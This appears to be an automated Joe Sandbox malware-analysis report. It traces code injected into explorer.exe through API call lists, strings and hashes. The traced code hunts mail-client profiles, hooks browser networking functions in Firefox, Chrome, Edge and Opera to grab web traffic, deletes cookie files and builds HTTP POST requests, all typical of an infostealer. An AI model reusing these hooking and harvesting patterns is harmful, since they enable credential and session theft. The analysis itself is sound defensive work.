908->909 910 801f37 StrStrIA 908->910 909->902 910->909 911 801f4a StrStrIA 910->911 911->909 912 801f5d lstrlen 911->912 912->909 913 801f6a 912->913 913->909 914 801f9b lstrlen 913->914 914->909 914->913 796 80118f 797 801192 796->797 798 80255c 16 API calls 797->798 799 8011ac 798->799 800 80255c 16 API calls 799->800 801 8011b9 800->801 802 80255c 16 API calls 801->802 803 8011c6 802->803

Control-flow Graph

APIs
  • Part of subcall function 008029B7: GetProcessHeap.KERNEL32(00000008,00000412,0080257A,008018F4), ref: 008029BA
  • Part of subcall function 008029B7: RtlAllocateHeap.NTDLL(00000000), ref: 008029C1
• lstrcatW.KERNEL32(00000000,?,008018F4), ref: 00802588
• PathAppendW.SHLWAPI(00000000,*.*,?,008018F4), ref: 00802594
• FindFirstFileW.KERNELBASE(00000000,?,?,008018F4), ref: 008025A8
• RtlZeroMemory.NTDLL(00000209,00000209), ref: 008025C3
• lstrcatW.KERNEL32(00000209,?,?,008018F4), ref: 008025E1
• PathAppendW.SHLWAPI(00000209,?,?,008018F4), ref: 008025ED
• lstrcatW.KERNEL32(00000209,?,?,008018F4), ref: 00802611
• PathAppendW.SHLWAPI(00000209,?,?,008018F4), ref: 0080261D
• StrStrIW.SHLWAPI(00000209,?,?,008018F4), ref: 0080262C
• FindNextFileW.KERNELBASE(00000000,?,?,008018F4), ref: 00802644
• FindClose.KERNELBASE(00000000,?,008018F4), ref: 00802653
Strings
Memory Dump Source
• Source File: 00000011.00000002.1746302421.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_801000_explorer.jbxd
Similarity
• API ID: AppendFindPathlstrcat$FileHeap$AllocateCloseFirstMemoryNextProcessZero
• String ID: *.*
• API String ID: 1648349226-438819550
• Opcode ID: b0e92d0298cca5e29868751aed60ed32beed128ff11488df8835b9b4321ddb1f
• Instruction ID: 1b11ce95a01361ff35aa3f44e2cfdfa87dd757df80ec17275f522057356d469b
• Opcode Fuzzy Hash: b0e92d0298cca5e29868751aed60ed32beed128ff11488df8835b9b4321ddb1f
• Instruction Fuzzy Hash: 6221D071205705AFD790AF249D4CE6FBBACFF95700F00041CFA61D2191DBBA8A068BA6

Control-flow Graph

APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00802758
• Process32First.KERNEL32(00000000,?), ref: 00802777
• lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0080278B
• Process32Next.KERNEL32(00000000,00000128), ref: 008027A8
• CloseHandle.KERNELBASE(00000000), ref: 008027B3
Strings
Memory Dump Source
• Source File: 00000011.00000002.1746302421.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_801000_explorer.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
• String ID: outlook.exe
• API String ID: 868014591-749849299
• Opcode ID: 33abd5b2b3e1621d1866d0983525834498ff4ea11dd5888d5b5b6f8900d9e7cd
• Instruction ID: 8c2497efd3603b9e6406fb2765235cc6447695c4123abe9db80dde689b6b223e
• Opcode Fuzzy Hash: 33abd5b2b3e1621d1866d0983525834498ff4ea11dd5888d5b5b6f8900d9e7cd
• Instruction Fuzzy Hash: A0F09631502528ABE7A0AB74DC4DFEE777CFB08721F000190F959E21D0DB748F544A91

Control-flow Graph

APIs
  • Part of subcall function 008027E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,00802664,?,008018F4), ref: 008027EF
• RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 0080103A
• NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00801043
Memory Dump Source
• Source File: 00000011.00000002.1746302421.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_801000_explorer.jbxd
Similarity
• API ID: MemoryMoveQuerySectionUnmapViewVirtual
• String ID:
• API String ID: 1675517319-0
• Opcode ID: cd32a9c5d255599d1b9f432f2d7f47a5088a165c7d6dcad8017fb4f23aab2cda
• Instruction ID: ff862849ff91afa9f99a15a703453079dccb47719cb5974938e3bd710379aec4
• Opcode Fuzzy Hash: cd32a9c5d255599d1b9f432f2d7f47a5088a165c7d6dcad8017fb4f23aab2cda
                                                                                                                                                      • Instruction Fuzzy Hash: BAD05E32801660ABDEE477B8BC5E9CA2A4CFF46330B244211B565D21D2C9754A8083B1

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 008029B7: GetProcessHeap.KERNEL32(00000008,00000412,0080257A,008018F4), ref: 008029BA
                                                                                                                                                        • Part of subcall function 008029B7: RtlAllocateHeap.NTDLL(00000000), ref: 008029C1
                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0080104E,?,00801010), ref: 0080107F
                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%LOCALAPPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0080104E,?,00801010), ref: 00801093
                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\Microsoft\Outlook,00000000,00000208,?,?,?,0080104E,?,00801010), ref: 008010A7
                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000005,00000000,?,?,?,0080104E,?,00801010), ref: 008010BB
                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Thunderbird,00000000,00000208,?,?,?,0080104E,?,00801010), ref: 008010D3
                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\The Bat!,00000000,00000208,?,?,?,0080104E,?,00801010), ref: 008010E7
                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\The Bat!,00000000,00000208,?,?,?,0080104E,?,00801010), ref: 008010FB
                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\BatMail,00000000,00000208,?,?,?,0080104E,?,00801010), ref: 0080110F
                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\BatMail,00000000,00000208,?,?,?,0080104E,?,00801010), ref: 00801123
                                                                                                                                                      • wsprintfA.USER32 ref: 0080116B
                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00801189
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.1746302421.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_801000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: EnvironmentExpandStrings$HeapProcess$AllocateExitFolderPathSpecialwsprintf
                                                                                                                                                      • String ID: %ALLUSERSPROFILE%\BatMail$%ALLUSERSPROFILE%\Microsoft\Outlook$%ALLUSERSPROFILE%\The Bat!$%APPDATA%\BatMail$%APPDATA%\Microsoft\Outlook$%APPDATA%\The Bat!$%APPDATA%\Thunderbird$%LOCALAPPDATA%\Microsoft\Outlook$%s,
                                                                                                                                                      • API String ID: 1709485025-1688604020
                                                                                                                                                      • Opcode ID: a6616649fc63c2593016b3fa55d03fbb777e175849487f8795f13593db8e7f13
                                                                                                                                                      • Instruction ID: 169739c34ee3bdb5dc8747a43b9d722f7d965f35badb0c44d8dc423e229de687
                                                                                                                                                      • Opcode Fuzzy Hash: a6616649fc63c2593016b3fa55d03fbb777e175849487f8795f13593db8e7f13
                                                                                                                                                      • Instruction Fuzzy Hash: 4631B1613416256AEFE9336A4C4EF7F284DFF91BA0B050124B655DA3C2DE588E0186F6

                                                                                                                                                      Control-flow Graph
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.1746302421.0000000000808000.00000040.80000000.00040000.00000000.sdmp, Offset: 00808000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_808000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 4ccd18aab7fae9d96f56d124f485a5d841d2ec720aad4e6d3483c55a10e5ffe6
                                                                                                                                                      • Instruction ID: 57cafcb6326af2325c755e812becbafe64cdd29a24cc4e127541619f6b7be823
                                                                                                                                                      • Opcode Fuzzy Hash: 4ccd18aab7fae9d96f56d124f485a5d841d2ec720aad4e6d3483c55a10e5ffe6
                                                                                                                                                      • Instruction Fuzzy Hash: F9915B725493924FE7629E74CCC06B1BBA0FB53324B2C06A9D9D1CB2D3E7A45C06C760

                                                                                                                                                      Control-flow Graph
                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000412,0080257A,008018F4), ref: 008029BA
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 008029C1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.1746302421.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_801000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$AllocateProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1357844191-0
                                                                                                                                                      • Opcode ID: 4ddd9079a0dc81a918d7fd91f83375f3a8953dfc185da8e4498712faf6a700f1
                                                                                                                                                      • Instruction ID: 386d4f8ac558541ee40770dbfe362448a103bbd61f911f90a91dea5d4ef62f1b
                                                                                                                                                      • Opcode Fuzzy Hash: 4ddd9079a0dc81a918d7fd91f83375f3a8953dfc185da8e4498712faf6a700f1
                                                                                                                                                      • Instruction Fuzzy Hash: 67A002B1A516005BDD8457B6AE0DA15752CB754701F004544734585064996456048721

                                                                                                                                                      Control-flow Graph
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 008029B7: GetProcessHeap.KERNEL32(00000008,00000412,0080257A,008018F4), ref: 008029BA
                                                                                                                                                        • Part of subcall function 008029B7: RtlAllocateHeap.NTDLL(00000000), ref: 008029C1
                                                                                                                                                        • Part of subcall function 00802938: lstrlen.KERNEL32(00B06136,?,00000000,00000000,008020E3,771A8A60,00B06136,00000000), ref: 00802940
                                                                                                                                                        • Part of subcall function 00802938: MultiByteToWideChar.KERNEL32(00000000,00000000,00B06136,00000001,00000000,00000000), ref: 00802952
                                                                                                                                                        • Part of subcall function 008024CC: RtlZeroMemory.NTDLL(?,00000018), ref: 008024DE
                                                                                                                                                      • RtlZeroMemory.NTDLL(?,0000003C), ref: 0080213F
                                                                                                                                                      • wsprintfW.USER32 ref: 00802278
                                                                                                                                                      • wsprintfW.USER32 ref: 008022E3
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 008023AD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.1746302421.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_801000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                                                      • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                                                                      • API String ID: 4204651544-1701262698
                                                                                                                                                      • Opcode ID: f984f26bc6e5406dcdbb03ae070f105cb658f1917561742850d124ceda59d0bf
                                                                                                                                                      • Instruction ID: 1b1cc955bbc1fdd681ba474494db7864d373851b8c5c78531d115c2e75d05c67
                                                                                                                                                      • Opcode Fuzzy Hash: f984f26bc6e5406dcdbb03ae070f105cb658f1917561742850d124ceda59d0bf
                                                                                                                                                      • Instruction Fuzzy Hash: 1AA15971609344AFD791DF68DC88A2BBBE8FB88344F00492DF585D33A1DAB4DA048B52

                                                                                                                                                      Control-flow Graph
                                                                                                                                                      APIs
                                                                                                                                                      • StrStrIA.SHLWAPI(?,008031D8,00000000,00B064D8), ref: 00801EE4
                                                                                                                                                      • RtlMoveMemory.NTDLL(?,?,00000000), ref: 00801F08
                                                                                                                                                      • RtlMoveMemory.NTDLL(?,?,00000100), ref: 00801F22
                                                                                                                                                      • StrStrIA.SHLWAPI(00000000,?,?,00000000), ref: 00801F31
                                                                                                                                                      • StrStrIA.SHLWAPI(00000000,?,?,00000000), ref: 00801F44
                                                                                                                                                      • StrStrIA.SHLWAPI(?,?,?,00000000), ref: 00801F57
                                                                                                                                                      • lstrlen.KERNEL32(?,?,00000000), ref: 00801F64
                                                                                                                                                      • lstrlen.KERNEL32(?,?,?,00000000), ref: 00801F9D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.1746302421.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_801000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MemoryMovelstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 456560858-0
                                                                                                                                                      • Opcode ID: ee7628d7b6dea6248fc5e6fed44f3e3f3d0d4028e6af5b8ea3a0ce13d1e6ca1b
                                                                                                                                                      • Instruction ID: 96be4158649dcbde9ac2b9736867f1dbba7616e2de78704238af7758a7b3bf95
                                                                                                                                                      • Opcode Fuzzy Hash: ee7628d7b6dea6248fc5e6fed44f3e3f3d0d4028e6af5b8ea3a0ce13d1e6ca1b
                                                                                                                                                      • Instruction Fuzzy Hash: 1321C8B250430A69EF70EA64EC89EEB77DCFF45364F400926F940C3191DF29D94987A2

                                                                                                                                                      Control-flow Graph
APIs
• lstrlen.KERNEL32(?,?,?,?,?,?,?,00801BF4), ref: 00801E5D
• CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?,?,00801BF4), ref: 00801E69
• lstrcmpiA.KERNEL32(?,00B0747C), ref: 00801E81
• lstrlen.KERNEL32(?,00000000), ref: 00802699
• RtlMoveMemory.NTDLL(00B0747C,?,00000000), ref: 008026A2
Memory Dump Source
• Source File: 00000011.00000002.1746302421.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_801000_explorer.jbxd
Similarity
• API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
• String ID:
• API String ID: 2826435453-0
• Opcode ID: d40a633f86665a38dc49eac4515f27dc8f206e31c964242c74eecaef273c8abe
• Instruction ID: cc24ad1c42c27f6a3c8d0685301b7b69fea59bd4e4c404e058cb954898792c7e
• Opcode Fuzzy Hash: d40a633f86665a38dc49eac4515f27dc8f206e31c964242c74eecaef273c8abe
• Instruction Fuzzy Hash: 04210BB2B016105FD7509F58EC889BE779DFF89321B10042AFC15C7281D7729D0687A2

Control-flow Graph (graph rendering not reproduced in text)

APIs
• lstrlen.KERNEL32(?,?,?,?,?,?,?,00801BF4), ref: 00801E5D
• CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?,?,00801BF4), ref: 00801E69
• lstrcmpiA.KERNEL32(?,00B0747C), ref: 00801E81
• lstrlen.KERNEL32(?,00000000), ref: 00802699
• RtlMoveMemory.NTDLL(00B0747C,?,00000000), ref: 008026A2
Memory Dump Source
• Source File: 00000011.00000002.1746302421.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_801000_explorer.jbxd
Similarity
• API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
• String ID:
• API String ID: 2826435453-0
• Opcode ID: d4b5c7ebeba06605251f4e4468ba582d6796be762d1de8e9083b60c34e49e059
• Instruction ID: 6d729b97d8630c8d32fda652d91e1382a92f8bbd7ad2abc6fa1233b98378a8e1
• Opcode Fuzzy Hash: d4b5c7ebeba06605251f4e4468ba582d6796be762d1de8e9083b60c34e49e059
• Instruction Fuzzy Hash: 7C21F672A016105FDB90CF68EC8896E77EDFF8A320B000469EC54D7281C77199068BA2

Control-flow Graph (graph rendering not reproduced in text)

APIs
• CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0080190C
• GetFileSize.KERNEL32(00000000,00000000), ref: 0080191C
• CloseHandle.KERNEL32(00000000), ref: 00801966
  • Part of subcall function 008029B7: GetProcessHeap.KERNEL32(00000008,00000412,0080257A,008018F4), ref: 008029BA
  • Part of subcall function 008029B7: RtlAllocateHeap.NTDLL(00000000), ref: 008029C1
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00801941
Memory Dump Source
• Source File: 00000011.00000002.1746302421.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_801000_explorer.jbxd
Similarity
• API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
• String ID:
• API String ID: 2517252058-0
• Opcode ID: fc1ca7a15a58de8d057d3b3a27f3be489282aaf53347892fc3ec8a285f84affd
• Instruction ID: d898efdd1f8111cb6a46bbc884d9e31840116619ae289c1e8bd935e860fc411a
• Opcode Fuzzy Hash: fc1ca7a15a58de8d057d3b3a27f3be489282aaf53347892fc3ec8a285f84affd
• Instruction Fuzzy Hash: 770149323012147BD6612B79DC5CE7F7E9DFB82BB4F010229F556E21E0DE209D058270

Execution Graph

Execution Coverage: 13.6%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 224
Total number of Limit Nodes: 16

Callgraph (graph rendering not reproduced in text)

Control-flow Graph (graph rendering not reproduced in text)

APIs
  • Part of subcall function 00161000: GetProcessHeap.KERNEL32(00000008,00000208,00161418), ref: 00161003
  • Part of subcall function 00161000: RtlAllocateHeap.NTDLL(00000000), ref: 0016100A
• GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00163886
• GetCurrentProcessId.KERNEL32(00000001), ref: 0016389B
• wsprintfA.USER32 ref: 001638B6
  • Part of subcall function 0016118D: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 001611A9
  • Part of subcall function 0016118D: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 001611C1
  • Part of subcall function 0016118D: lstrlen.KERNEL32(?,00000000), ref: 001611C9
  • Part of subcall function 0016118D: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 001611D4
  • Part of subcall function 0016118D: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 001611EE
  • Part of subcall function 0016118D: wsprintfA.USER32 ref: 00161205
  • Part of subcall function 0016118D: CryptDestroyHash.ADVAPI32(?), ref: 0016121E
  • Part of subcall function 0016118D: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00161228
• CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 001638CD
• GetLastError.KERNEL32 ref: 001638D3
• RtlInitializeCriticalSection.NTDLL(00166038), ref: 001638F3
• PathFindFileNameA.SHLWAPI(?), ref: 001638FA
• lstrcat.KERNEL32(00165CDE,00000000), ref: 00163910
• Sleep.KERNEL32(000001F4), ref: 0016392A
                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,firefox.exe), ref: 0016393C
                                                                                                                                                      • GetCommandLineW.KERNEL32(?), ref: 0016394F
                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,VirtualQuery), ref: 0016397E
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00163987
                                                                                                                                                      • GetModuleHandleA.KERNEL32(nspr4.dll,PR_GetDescType), ref: 001639AF
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 001639B2
                                                                                                                                                      • GetModuleHandleA.KERNEL32(nss3.dll,PR_GetDescType), ref: 001639C4
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 001639C7
                                                                                                                                                      • GetModuleHandleA.KERNEL32(nspr4.dll,PR_Write), ref: 001639E1
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 001639E4
                                                                                                                                                      • GetModuleHandleA.KERNEL32(nss3.dll,PR_Write), ref: 001639EC
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 001639EF
                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,chrome.exe), ref: 00163A6D
                                                                                                                                                      • GetCommandLineA.KERNEL32(NetworkService), ref: 00163A78
                                                                                                                                                      • StrStrIA.SHLWAPI(00000000), ref: 00163A7B
                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,opera.exe), ref: 00163A8E
                                                                                                                                                      • GetCommandLineA.KERNEL32(NetworkService), ref: 00163A9D
                                                                                                                                                      • StrStrIA.SHLWAPI(00000000), ref: 00163AA0
                                                                                                                                                      • GetModuleHandleA.KERNEL32(opera.dll), ref: 00163ABF
                                                                                                                                                      • GetModuleHandleA.KERNEL32(opera_browser.dll), ref: 00163ACC
                                                                                                                                                      • CommandLineToArgvW.SHELL32(00000000), ref: 00163956
                                                                                                                                                        • Part of subcall function 001616C7: GetCurrentProcessId.KERNEL32 ref: 001616D9
                                                                                                                                                        • Part of subcall function 001616C7: GetCurrentThreadId.KERNEL32 ref: 001616E1
                                                                                                                                                        • Part of subcall function 001616C7: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 001616F1
                                                                                                                                                        • Part of subcall function 001616C7: Thread32First.KERNEL32(00000000,0000001C), ref: 001616FF
                                                                                                                                                        • Part of subcall function 001616C7: CloseHandle.KERNEL32(00000000), ref: 00161758
                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,iexplore.exe), ref: 00163A10
                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,microsoftedgecp.exe), ref: 00163A20
                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,msedge.exe), ref: 00163A30
                                                                                                                                                      • GetCommandLineA.KERNEL32(NetworkService), ref: 00163A47
                                                                                                                                                      • StrStrIA.SHLWAPI(00000000), ref: 00163A4A
                                                                                                                                                      • GetModuleHandleA.KERNEL32(chrome.dll), ref: 00163A5F
                                                                                                                                                      • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestA), ref: 00163B2C
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00163B35
                                                                                                                                                      • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestW), ref: 00163B52
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00163B55
                                                                                                                                                      • GetModuleHandleA.KERNEL32(wininet.dll,InternetWriteFile), ref: 00163B72
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00163B75
                                                                                                                                                      • GetModuleHandleA.KERNEL32(wininet.dll,HttpQueryInfoA), ref: 00163B99
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00163B9C
                                                                                                                                                      • GetModuleHandleA.KERNEL32(wininet.dll,InternetQueryOptionA), ref: 00163BA9
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00163BAC
                                                                                                                                                      • GetModuleHandleA.KERNEL32(wininet.dll,InternetGetCookieA), ref: 00163BB9
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00163BBC
                                                                                                                                                        • Part of subcall function 00161C08: RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 00161C42
                                                                                                                                                      • RtlExitUserThread.NTDLL(00000000), ref: 00163BD9
                                                                                                                                                      • wsprintfA.USER32 ref: 00163C1F
                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00163C69
                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 00163C88
                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 00163D77
                                                                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00163D82
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Handle$Module$AddressProc$Cryptlstrcmpi$CommandLine$CreateHash$CurrentProcesswsprintf$CloseContextFileFirstHeapNameSleepSnapshotThreadToolhelp32$AcquireAllocateArgvCriticalDataDestroyErrorExitFindInitializeLastMemoryMoveMutexParamPathProcess32ReleaseSectionThread32Userlstrcatlstrlen
                                                                                                                                                      • String ID: %s%d%d%d$%s%s$HttpQueryInfoA$HttpSendRequestA$HttpSendRequestW$InternetGetCookieA$InternetQueryOptionA$InternetWriteFile$NetworkService$PR_GetDescType$PR_Write$VirtualQuery$chrome.dll$chrome.exe$fgclearcookies$firefox.exe$iexplore.exe$kernel32.dll$microsoftedgecp.exe$msedge.dll$msedge.exe$nspr4.dll$nss3.dll$opera.dll$opera.exe$opera_browser.dll$wininet.dll
                                                                                                                                                      • API String ID: 2480436012-2618538661
                                                                                                                                                      • Opcode ID: 000d34ac2aeb7e00b67d375bb3fa28afa5e1288e387f66371c82575c515f0d4b
                                                                                                                                                      • Instruction ID: 34cd383b32285c1464047a5b56a655c396b7f513a827c11256a604d037c3124a
                                                                                                                                                      • Opcode Fuzzy Hash: 000d34ac2aeb7e00b67d375bb3fa28afa5e1288e387f66371c82575c515f0d4b
                                                                                                                                                      • Instruction Fuzzy Hash: 9BA13571A40325BBDB107BB59C09E2F3A9C9F52B42B050528F911E3291DFB5CD61CAB1

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00161000: GetProcessHeap.KERNEL32(00000008,00000208,00161418), ref: 00161003
                                                                                                                                                        • Part of subcall function 00161000: RtlAllocateHeap.NTDLL(00000000), ref: 0016100A
                                                                                                                                                      • PathCombineW.SHLWAPI(00000000,00000000,*.*,771EF770,00000000,76B2B2E0,777783D0), ref: 001615EB
                                                                                                                                                      • FindFirstFileW.KERNELBASE(00000000,?), ref: 001615F7
                                                                                                                                                      • lstrcmpiW.KERNEL32(?,001641C8), ref: 00161623
                                                                                                                                                      • lstrcmpiW.KERNEL32(?,001641CC), ref: 00161633
                                                                                                                                                      • PathCombineW.SHLWAPI(00000000,?,?), ref: 0016164C
                                                                                                                                                      • PathMatchSpecW.SHLWAPI(?,Cookies*), ref: 00161661
                                                                                                                                                      • PathCombineW.SHLWAPI(00000000,?,?), ref: 0016167E
                                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0016169C
                                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 001616AB
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Path$CombineFind$FileHeaplstrcmpi$AllocateCloseFirstMatchNextProcessSpec
                                                                                                                                                      • String ID: *.*$Cookies*
                                                                                                                                                      • API String ID: 4256701249-3228320225
                                                                                                                                                      • Opcode ID: a71e2d21f9ff80f7b665c04f10f50ea67942b69a84b170dc39b502cd7ff53dab
                                                                                                                                                      • Instruction ID: a4457f689ebaa00f72919407fe9f25c02890b99f89bd9c2a11399014afbdb9aa
                                                                                                                                                      • Opcode Fuzzy Hash: a71e2d21f9ff80f7b665c04f10f50ea67942b69a84b170dc39b502cd7ff53dab
                                                                                                                                                      • Instruction Fuzzy Hash: C421B4712043556BD700AF60DC45A7F7BECEB9A382F080529F941D3241DBB8DD9487A2

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 001613FE: wsprintfW.USER32 ref: 0016142A
                                                                                                                                                        • Part of subcall function 001613FE: FindFirstFileW.KERNELBASE(00000000,?), ref: 00161439
                                                                                                                                                        • Part of subcall function 001613FE: wsprintfW.USER32 ref: 00161476
                                                                                                                                                        • Part of subcall function 001613FE: RemoveDirectoryW.KERNELBASE(00000000), ref: 0016149C
                                                                                                                                                        • Part of subcall function 001613FE: FindNextFileW.KERNELBASE(00000000,00000010), ref: 001614AF
                                                                                                                                                        • Part of subcall function 001613FE: FindClose.KERNELBASE(00000000), ref: 001614BA
                                                                                                                                                        • Part of subcall function 00161000: GetProcessHeap.KERNEL32(00000008,00000208,00161418), ref: 00161003
                                                                                                                                                        • Part of subcall function 00161000: RtlAllocateHeap.NTDLL(00000000), ref: 0016100A
                                                                                                                                                      • wsprintfW.USER32 ref: 0016150D
                                                                                                                                                      • FindFirstFileW.KERNELBASE(00000000,?), ref: 0016151C
                                                                                                                                                      • wsprintfW.USER32 ref: 00161557
                                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0016156A
                                                                                                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 00161571
                                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00161584
                                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 0016158F
